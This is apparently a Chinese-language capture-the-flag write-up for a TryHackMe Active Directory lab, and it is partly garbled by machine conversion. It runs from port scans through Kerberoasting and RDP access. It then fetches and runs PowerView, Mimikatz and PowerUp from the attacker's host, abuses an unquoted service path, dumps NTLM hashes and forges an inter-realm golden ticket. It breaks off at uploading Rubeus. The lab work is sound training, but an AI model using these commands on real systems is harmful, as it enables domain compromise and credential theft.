服务探测

端口探测

root@ip-10-10-208-107:~# nmap -p- 10.10.59.205 --openStarting Nmap 7.60 ( https://nmap.org ) at 2022-03-04 02:48 GMTNmap scan report for ip-10-10-248-133.eu-west-1.compute.internal (10.10.59.205)Host is up (0.0039s latency).Not shown: 61918 closed ports, 3588 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT      STATE SERVICE53/tcp    open  domain80/tcp    open  http88/tcp    open  kerberos-sec135/tcp   open  msrpc139/tcp   open  netbios-ssn389/tcp   open  ldap445/tcp   open  microsoft-ds464/tcp   open  kpasswd5593/tcp   open  http-rpc-epmap636/tcp   open  ldapssl3268/tcp  open  globalcatLDAP3269/tcp  open  globalcatLDAPssl3389/tcp  open  ms-wbt-server5357/tcp  open  wsdapi5985/tcp  open  wsman7990/tcp  open  unknown9389/tcp  open  adws47001/tcp open  winrm49664/tcp open  unknown49665/tcp open  unknown49666/tcp open  unknown49668/tcp open  unknown49669/tcp open  unknown49670/tcp open  unknown49671/tcp open  unknown49673/tcp open  unknown

服务探测

root@ip-10-10-208-107:~# nmap -sV -Pn 10.10.59.205 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5357,5985,7990,9389,47001,49664-49673Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-04 02:57 GMTNmap scan report for ip-10-10-248-133.eu-west-1.compute.internal (10.10.59.205)Host is up (0.00075s latency).PORT      STATE  SERVICE       VERSION53/tcp    open   domain        Microsoft DNS80/tcp    open   http          Microsoft IIS httpd 10.088/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-04 02:57:49Z)135/tcp   open   msrpc         Microsoft Windows RPC139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)445/tcp   open   microsoft-ds?464/tcp   open   kpasswd5?593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0636/tcp   open   tcpwrapped3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)3269/tcp  open   tcpwrapped3389/tcp  open   ms-wbt-server Microsoft Terminal Services5357/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)7990/tcp  open   http          Microsoft IIS httpd 10.09389/tcp  open   mc-nmf        .NET Message Framing47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)49664/tcp open   msrpc         Microsoft Windows RPC49665/tcp open   msrpc         Microsoft Windows RPC49666/tcp open   msrpc         Microsoft Windows RPC49667/tcp closed unknown49668/tcp open   msrpc         Microsoft Windows RPC49669/tcp open   msrpc         Microsoft Windows RPC49670/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.049671/tcp open   msrpc         Microsoft Windows RPC49672/tcp closed unknown49673/tcp open   msrpc         Microsoft Windows RPCMAC Address: 02:CC:01:6E:8F:D9 (Unknown)Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 62.08 seconds

smb

枚举分项目录

┌──(rootkali)-[~/tryhackme/Enterprise]└─# crackmapexec smb 10.10.59.205 -u '' -p '' --sharesSMB         10.10.59.205   445    LAB-DC           [*] Windows 10.0 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False)SMB         10.10.59.205   445    LAB-DC           [-] LAB.ENTERPRISE.THM\: STATUS_ACCESS_DENIED SMB         10.10.59.205   445    LAB-DC           [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

不容许匿名登录，然而失去了
域的名称：LAB.ENTERPRISE.THM
DC服务器的名字： LAB-DC

用smbclient再次枚举，这次呈现了分享的目录

┌──(rootkali)-[~/tryhackme/Enterprise]└─# smbclient --no-pass -L //10.10.59.205        Sharename       Type      Comment        ---------       ----      -------        ADMIN$          Disk      Remote Admin        C$              Disk      Default share        Docs            Disk              IPC$            IPC       Remote IPC        NETLOGON        Disk      Logon server share         SYSVOL          Disk      Logon server share         Users           Disk      Users Share. Do Not Touch!Reconnecting with SMB1 for workgroup listing.do_connect: Connection to 10.10.59.205 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)Unable to connect with SMB1 -- no workgroup available

Users

能够登录

┌──(rootkali)-[~/tryhackme/Enterprise]└─# smbclient --no-pass //10.10.59.205/UsersTry "help" to get a list of possible commands.smb: \> ls  .                                  DR        0  Thu Mar 11 21:11:49 2021  ..                                 DR        0  Thu Mar 11 21:11:49 2021  Administrator                       D        0  Thu Mar 11 16:55:48 2021  All Users                       DHSrn        0  Sat Sep 15 03:28:48 2018  atlbitbucket                        D        0  Thu Mar 11 17:53:06 2021  bitbucket                           D        0  Thu Mar 11 21:11:51 2021  Default                           DHR        0  Thu Mar 11 19:18:03 2021  Default User                    DHSrn        0  Sat Sep 15 03:28:48 2018  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018  LAB-ADMIN                           D        0  Thu Mar 11 19:28:14 2021  Public                             DR        0  Thu Mar 11 16:27:02 2021                15587583 blocks of size 4096. 9920786 blocks available

整顿一个user list

AdministratoratlbitbucketbitbucketLAB-ADMIN

尝试枚举下面用户是否敞开了kerberos预认证

找到一个用户凭据文件

smb: \LAB-ADMIN\AppData\Local\Microsoft\Credentials\> ls  .                                 DSn        0  Thu Mar 11 19:28:46 2021  ..                                DSn        0  Thu Mar 11 19:28:46 2021  DFBE70A7E5CC19A398EBF1B96859CE5D   AHSn    11152  Thu Mar 11 18:09:04 2021                15587583 blocks of size 4096. 9919566 blocks available

这个查了一下是RDP登录凭证，然而查了一下如同没有方法破解

Docs

┌──(rootkali)-[~/tryhackme/Enterprise]└─# smbclient --no-pass //10.10.59.205/DocsTry "help" to get a list of possible commands.smb: \> ls  .                                   D        0  Sun Mar 14 22:47:35 2021  ..                                  D        0  Sun Mar 14 22:47:35 2021  RSA-Secured-Credentials.xlsx        A    15360  Sun Mar 14 22:46:54 2021  RSA-Secured-Document-PII.docx       A    18432  Sun Mar 14 22:45:24 2021

有两个office文件，然而收到了密码保护，应用这个office2john.py转成能够被john辨认的哈希值，应用john破解，然而没有任何后果

http

80端口没有任何有用的货色

7990也是一个http端口，看上去跑了一个叫ATLASSIAN 的web app，但其实只是一个动态页面

登录框写了一行字：

Reminder to all Enterprise-THM Employees:We are moving to Github!

在谷歌上搜寻enterprise-thm github找到了这个github页面

只有一个About-US的project

维护者是一个叫Nik-enterprise-dev的人，点进个人主页，还保护了一个powershell我的项目
只有一个脚本

Import-Module ActiveDirectory$userName = ''$userPassword = ''$psCreds = ConvertTo-SecureString $userPassword -AsPlainText -Force$Computers = New-Object -TypeName "System.Collections.ArrayList"$Computer = $(Get-ADComputer -Filter * | Select-Object Name)for ($index = -1; $index -lt $Computer.count; $index++) { Invoke-Command -ComputerName $index {systeminfo} }

用户名和明码都为空

点击这个脚本的history页面，找到最后版本，记录了用户名和明码

Import-Module ActiveDirectory$userName = 'nik'$userPassword = 'ToastyBoi!'$psCreds = ConvertTo-SecureString $userPassword -AsPlainText -Force$Computers = New-Object -TypeName "System.Collections.ArrayList"$Computer = $(Get-ADComputer -Filter * | Select-Object Name)for ($index = -1; $index -lt $Computer.count; $index++) { Invoke-Command -ComputerName $index {systeminfo} }

当初有了一个用户凭据

nik:ToastyBoi!

find SPN

┌──(rootkali)-[~/tryhackme/Enterprise]└─# python3 /opt/impacket/examples/GetUserSPNs.py  -dc-ip 10.10.59.205 lab.enterprise.thm/nik:ToastyBoi!  -request -outputfile hash.txt                                                                                               130 ⨯Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth CorporationServicePrincipalName  Name       MemberOf                                                     PasswordLastSet             LastLogon                   Delegation --------------------  ---------  -----------------------------------------------------------  --------------------------  --------------------------  ----------HTTP/LAB-DC           bitbucket  CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM  2021-03-11 20:20:01.333272  2021-04-26 11:16:41.570158   

失去一个用户的SPN,用john破解

┌──(rootkali)-[~/tryhackme/Enterprise]└─# cat hash.txt $krb5tgs$23$*bitbucket$LAB.ENTERPRISE.THM$lab.enterprise.thm/bitbucket*$d286d86f986ebc5ed08752398bfa566a$878cf038efff7b158da57d8e041a07b03e4194ac25e7348658120d4bb26b762213465f35bb7b065aa5bbb321607d8d32a7044473170be71cddeb9df93a404ec3e45ac782c3f603a64b47d890deec82e96e2f20c15f3a55c5017ccb80544f41af572083863551d85a7d24c08700914cd170294f7c295b5312fa5e9ded3605705fe55d8acc0937f7268e4fef90254823400931c454833bc2acf4d319f67f336fb4984aeb6a51543336bb5fc68c43a7546b93b44abc518878b34b476545935a82630e5ded8cd7b201aff3da2f2e9015a5b679d6a39a0a419883169dd9b943ed9452c287b7778f7e367ffaa153e6238cf3b964a3842c7a82037cd0805c7b0df82e354588bfc8f256a02a91d70c03b58a564fbb04577b45670d7e5ec3b919244bc71df6afb7aa4ac7471f59e1c6e572dc28fb0fc142dd9d5b60e132e2c1820282b2c70e189af31484705d427bacfc89080a7738c6018a594eb9ac34140d0a8bdd625a5edf25caf543880203ec1779543ca06911a8375339b50ee3438126d894b1a7c15fa5d772bc2dcec1134399ccbfe98f07ea62ebd1d3970524b07be6d8f2bebb9be1470f2472bfe57656622b2767a045dbfe575a90bb25546ebd34e000d2175d107a0421c9a8a1968bee1c3736b3d35100f3edab7ecc4efb1b2ae185832d97e7c02b54a9e61c05875c72a2a21f0f94fef0a0ad35f7e77b2134605a56df3613061f4f3f25a43e3c185a861d1af30d2e4451cfe7fcc15a6aafb963160d941e286366f695f44cab437e83b85bbe06f0601fdd3fc686108b14bb33b91f1fb0ad9fb88e460ef7cfe59f729b18f84226977f58f8fa35eb6f66ce9dda6188b64e23f27f73a206b8640b46132bc73b1efb47c8bf9788010f26c2a9f70581488896a729c814763e7d69bfdcb26675da14c9dc27b99ea412cb07d6030d0d6b2fa57fa71aa8d6530c98741dd16722ee29e77e3f5635db125ee79df40d3df607bc6fc2217cfe6e08c4c6e545c3597f526f9efd1aecf4869cab95eb61c3c627edefb0c8661d081d2b704502f7d6ca8ab4c8df6134accaef9e8e8a3d5eeb54e3054e54eca1991db472ff9e4371301c8a59cff106c343d064d789d409b7f69ce96b8e8091c323ed9edd09beda75555d866b71a6e10d7eef8406ea47aaa77b040f06ad9e688deef6942e2076e285b02ce67104d816f9dfe323b348d97d2790ac12545e7b5fc4a92ba7da5fcab00e47146111bd0cff0c925f33674ffbf972522d295b08ec1eb07c206590634bcfa000d32d4b63296e864606282307059645816bd50c5d12d5c63e671f062f84b5e7c6efacef5d940f75cc9a149801ffe5f49f068f8d62eebabcd2cb1a604b72                                                                                                                                                                                                                                            ┌──(rootkali)-[~/tryhackme/Enterprise]└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txtUsing default input encoding: UTF-8Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statuslittleredbucket  (?)     1g 0:00:00:01 DONE (2022-03-04 00:56) 0.8620g/s 1354Kp/s 1354Kc/s 1354KC/s livelife93..liss27Use the "--show" option to display all of the cracked passwords reliablySession completed. 

账号：bitbucket
明码：littleredbucket

应用上面命令rdp连贯靶机

xfreerdp /f /u:bitbucket /p:littleredbucket /v:10.10.59.205 /size:1280x1030

桌面找到用户flag

本地权限晋升

在kali起一个繁难http服务器，通过http把枚举和提权工具传到靶机

iex (iwr http://10.11.63.196/PowerView.ps1 -UseBasicParsing)iex (iwr http://10.11.63.196/SharpHound.ps1 -UseBasicParsing)iex (iwr http://10.11.63.196/Invoke-Mimikatz.ps1  -UseBasicParsing)iex (iwr http://10.11.63.196/PowerUp.ps1  -UseBasicParsing)

枚举所有域用户

PS C:\Users\bitbucket> get-netuser|select cncn--AdministratorGuestatlbitbucketkrbtgtBitBuckernikREPLICATIONspooksKoroneBananaCakeContractorVargJoiner

枚举所有DA用户

PS C:\Users\bitbucket\Desktop> Get-NetGroupMember -GroupName "Domain Admins" -Recurse |select MemberNameMemberName----------joinerCakekoroneAdministrator

应用SharpHound手机域信息

Invoke-BloodHound -CollectionMethod All -verbose

如何把文件从靶机传回kali，这里应用smb，因为咱们有了bitbucket的登录凭证，能够放到users的bitbucket下，而后应用smb下载

应用PowerUp，发现存在一个unquoted service paths的服务

[*] Checking for unquoted service paths...ServiceName    : zerotieroneservicePath           : C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exeModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}StartName      : LocalSystemAbuseFunction  : Write-ServiceBinary -Name 'zerotieroneservice' -Path <HijackPath>CanRestart     : TrueServiceName    : zerotieroneservicePath           : C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exeModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}StartName      : LocalSystemAbuseFunction  : Write-ServiceBinary -Name 'zerotieroneservice' -Path <HijackPath>CanRestart     : True

通过简略测试，发现能够在C:\Program Files (x86)\Zero Tier\写入文件，并且对这个服务有重启的权限

用Write-ServiceBinary办法，写一个Zero.exe

PS C:\Program Files (x86)\Zero Tier> Write-ServiceBinary -Name 'zerotieroneservice' -Path 'C:\Program Files (x86)\Zero Tier\Zero.exe'ServiceName        Path                                      Command-----------        ----                                      -------zerotieroneservice C:\Program Files (x86)\Zero Tier\Zero.exe net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add

这一步次要是创立了一个叫john的用户，明码是Password123!，并且把john退出到本地管理员组

已存在在目标目录

PS C:\Program Files (x86)\Zero Tier> ls    Directory: C:\Program Files (x86)\Zero TierMode                LastWriteTime         Length Name----                -------------         ------ ----d-----        3/14/2021   6:08 PM                Zero Tier One-a----         3/4/2022  12:58 AM              6 1.txt-a----         3/4/2022   1:01 AM          22016 Zero.exe

重启服务

PS C:\Program Files (x86)\Zero Tier> sc.exe stop zerotieroneservice[SC] ControlService FAILED 1062:The service has not been started.PS C:\Program Files (x86)\Zero Tier> sc.exe start zerotieroneserviceSERVICE_NAME: zerotieroneservice        TYPE               : 10  WIN32_OWN_PROCESS        STATE              : 2  START_PENDING                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)        WIN32_EXIT_CODE    : 0  (0x0)        SERVICE_EXIT_CODE  : 0  (0x0)        CHECKPOINT         : 0x0        WAIT_HINT          : 0x7d0        PID                : 5348        FLAGS              :

当初，在桌面已管理员权限开启一个shell，输出用户凭据：john:Password123!

胜利开启一个管理员权限的shell

PS C:\Windows\system32> whoami /allUSER INFORMATION----------------User Name           SID=================== ============================================lab-enterprise\john S-1-5-21-2168718921-3906202695-65158103-1120GROUP INFORMATION-----------------Group Name                                 Type             SID          Attributes========================================== ================ ============ ===============================================================Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled groupBUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group ownerBUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled groupBUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled groupNT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled groupLOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled groupAuthentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled groupMandatory Label\High Mandatory Level       Label            S-1-16-12288

能够看到曾经存在在BUILTIN\Administrators用户组

拿到root.txt

PS C:\users\Administrator\Desktop> type .\root.txtTHM{1a1fa948754212963...}

跨域（没有胜利）

枚举所有信赖关系

PS C:\users\bitbucket\Desktop> Get-NetForestDomain -Verbose | Get-NetDomainTrustSourceName         TargetName       TrustType TrustDirection----------         ----------       --------- --------------LAB.ENTERPRISE.THM ENTERPRISE.THM ParentChild  BidirectionalLAB.ENTERPRISE.THM morimori.com      Kerberos       Outbound

发现跟父域是双向信赖的

应用Mimikatz导出所有NTML哈希

PS C:\users\Administrator\Desktop> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ##       > https://blog.gentilkiwi.com/mimikatz '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(powershell) # lsadump::lsa /patchDomain : LAB-ENTERPRISE / S-1-5-21-2168718921-3906202695-65158103RID  : 000001f4 (500)User : AdministratorLM   :NTLM : 8537943ee84c50d9d4035c519ce2cb68RID  : 000001f5 (501)User : GuestLM   :NTLM :RID  : 000001f6 (502)User : krbtgtLM   :NTLM : 43c1c941c7f0eb3a74d8864ab7dfa212<skip>

以Administrator身份开启一个shell

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:LAB.ENTERPRISE.THM /ntlm:8537943ee84c50d9d4035c519ce2cb68 /run:powershell.exe"'

枚举DC服务器的所有信赖关系

PS C:\Windows\system32> Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName LAB-DC.LAB.ENTERPRISE.THM  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ##       > https://blog.gentilkiwi.com/mimikatz '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(powershell) # lsadump::trust /patchCurrent domain: LAB.ENTERPRISE.THM (LAB-ENTERPRISE / S-1-5-21-2168718921-3906202695-65158103)Domain: ENTERPRISE.THM (ENTERPRISE / S-1-5-21-1835041512-953509921-1126143443) [  In ] LAB.ENTERPRISE.THM -> ENTERPRISE.THM    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c        * aes256_hmac       eb0a1f52c2e7f30dbcf02a1737e2527da685a36d511e6b96da5d3517ba91a73c        * aes128_hmac       7eed741499c0611a0275bfd2d83b0de1        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f [ Out ] ENTERPRISE.THM -> LAB.ENTERPRISE.THM    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c        * aes256_hmac       643128314165f87c41041f07c13490fc0d96189f45c2eb3efcaa956707dd5a5e        * aes128_hmac       3872b51d2e6716a863060cf1c00e4980        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f [ In-1] LAB.ENTERPRISE.THM -> ENTERPRISE.THM    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c        * aes256_hmac       eb0a1f52c2e7f30dbcf02a1737e2527da685a36d511e6b96da5d3517ba91a73c        * aes128_hmac       7eed741499c0611a0275bfd2d83b0de1        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731f [Out-1] ENTERPRISE.THM -> LAB.ENTERPRISE.THM    * 3/11/2021 4:30:39 PM - CLEAR   - b9 f4 a3 46 54 fe ad 6c 3d a6 0b 74 cd 56 49 ea 3c 2d c1 79 11 cd e0 6c ce d9 c8 6c fa 93 c8 8a b7 39 be a7 0d 25 01 6b 90 3b 0c ad 82 65 b8 ba 0c fc be 07 13 9b fd 39 89 09 8f 03 41 3e d3 4c 3f e6 ba 97 d1 37 47 7d 10 56 c6 0c ce 55 ba bf 7a 86 6d fd 90 e4 ca 8f 00 0d bc f4 8f d7 c2 23 e8 61 70 48 de a0 b1 14 2d 45 ce 67 3d 0b 2f 2d 07 fb 1e b8 84 b0 e3 e1 c7 25 64 f6 fe c5 f5 9a ba a5 bd 0d 3a 14 45 4f 01 ee 80 49 d3 14 a4 ab 76 7c 3b 59 ef a4 17 41 34 b1 c0 9d 9b 58 48 dd f9 03 7c 74 7e ed d6 6e 9a ba f3 d4 be e5 a1 fc 51 a1 a9 8e f8 d0 0b 9f f6 db a1 e9 de a7 7c 57 f2 00 3f a2 e2 35 6c 47 1d da 5f 5d 48 db 6f 61 3c 41 61 23 c7 65 ce f5 6e 78 d2 25 21 40 8c 60 9f 0e 3f 46 7c 19 63 e7 8c 58 52 db 49 21 6b a6 d1 02 ac 6f a6 81 bd 1f be 6b e1 62 94 ec 3d 7c        * aes256_hmac       643128314165f87c41041f07c13490fc0d96189f45c2eb3efcaa956707dd5a5e        * aes128_hmac       3872b51d2e6716a863060cf1c00e4980        * rc4_hmac_nt       d84d2d46e70ebdcd94ec6f3c79f5731fDomain: MORIMORI.COM (morimori.comERROR kull_m_string_displaySID ; ConvertSidToStringSid (0x00000057)) [  In ] LAB.ENTERPRISE.THM -> MORIMORI.COM [ Out ] MORIMORI.COM -> LAB.ENTERPRISE.THM    * 3/11/2021 7:30:30 PM - CLEAR   - 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00        * aes256_hmac       a80d035b0775088e8ec1836d43f8b32f4cafca1f31f7c46f1615651dd140f382        * aes128_hmac       10aac1e975ebdd4edb90692ebb2db502        * rc4_hmac_nt       a4f49c406510bdcab6824ee7c30fd852 [ In-1] LAB.ENTERPRISE.THM -> MORIMORI.COM [Out-1] MORIMORI.COM -> LAB.ENTERPRISE.THM    * 3/11/2021 7:30:30 PM - CLEAR   - 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00        * aes256_hmac       a80d035b0775088e8ec1836d43f8b32f4cafca1f31f7c46f1615651dd140f382        * aes128_hmac       10aac1e975ebdd4edb90692ebb2db502        * rc4_hmac_nt       a4f49c406510bdcab6824ee7c30fd852

伪造一条到父域ENTERPRISE.THM的TGT

从下面信息咱们得悉，父域的SID是：S-1-5-21-1835041512-953509921-1126143443

这里须要留神上面命令参数里的rc4，必须是下面枚举进去的
* rc4_hmac_nt d84d2d46e70ebdcd94ec6f3c79f5731f这个值

伪造TGT

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi"'

执行

PS C:\users\Administrator\Desktop> Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi"'  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ##       > https://blog.gentilkiwi.com/mimikatz '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(powershell) # Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbiUser      : AdministratorDomain    : LAB.ENTERPRISE.THM (LAB)SID       : S-1-5-21-2168718921-3906202695-65158103User Id   : 500Groups Id : *513 512 520 518 519Extra SIDs: S-1-5-21-1835041512-953509921-1126143443-519 ;ServiceKey: d84d2d46e70ebdcd94ec6f3c79f5731f - rc4_hmac_ntService   : krbtgtTarget    : ENTERPRISE.THMLifetime  : 3/4/2022 1:37:00 AM ; 3/1/2032 1:37:00 AM ; 3/1/2032 1:37:00 AM-> Ticket : C:\users\bitbucket\Desktop\trust_tkt.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generatedFinal Ticket Saved to file !

查看以后林

PS C:\users\bitbucket\Desktop> Get-NetForestRootDomainSid         : S-1-5-21-1835041512-953509921-1126143443Name                  : ENTERPRISE.THMSites                 : {Default-First-Site-Name}Domains               : {ENTERPRISE.THM, LAB.ENTERPRISE.THM}GlobalCatalogs        : {ENTERPRISE-DC.ENTERPRISE.THM, LAB-DC.LAB.ENTERPRISE.THM}ApplicationPartitions : {DC=ForestDnsZones,DC=ENTERPRISE,DC=THM, DC=DomainDnsZones,DC=ENTERPRISE,DC=THM, DC=DomainDnsZones,DC=LAB,DC=ENTERPRISE,DC=THM}ForestModeLevel       : 7ForestMode            : UnknownRootDomain            : ENTERPRISE.THMSchema                : CN=Schema,CN=Configuration,DC=ENTERPRISE,DC=THMSchemaRoleOwner       : ENTERPRISE-DC.ENTERPRISE.THMNamingRoleOwner       : ENTERPRISE-DC.ENTERPRISE.THM

能够看到父域的DC服务器是：ENTERPRISE-DC.ENTERPRISE.THM

传Rubeus.exe到本地

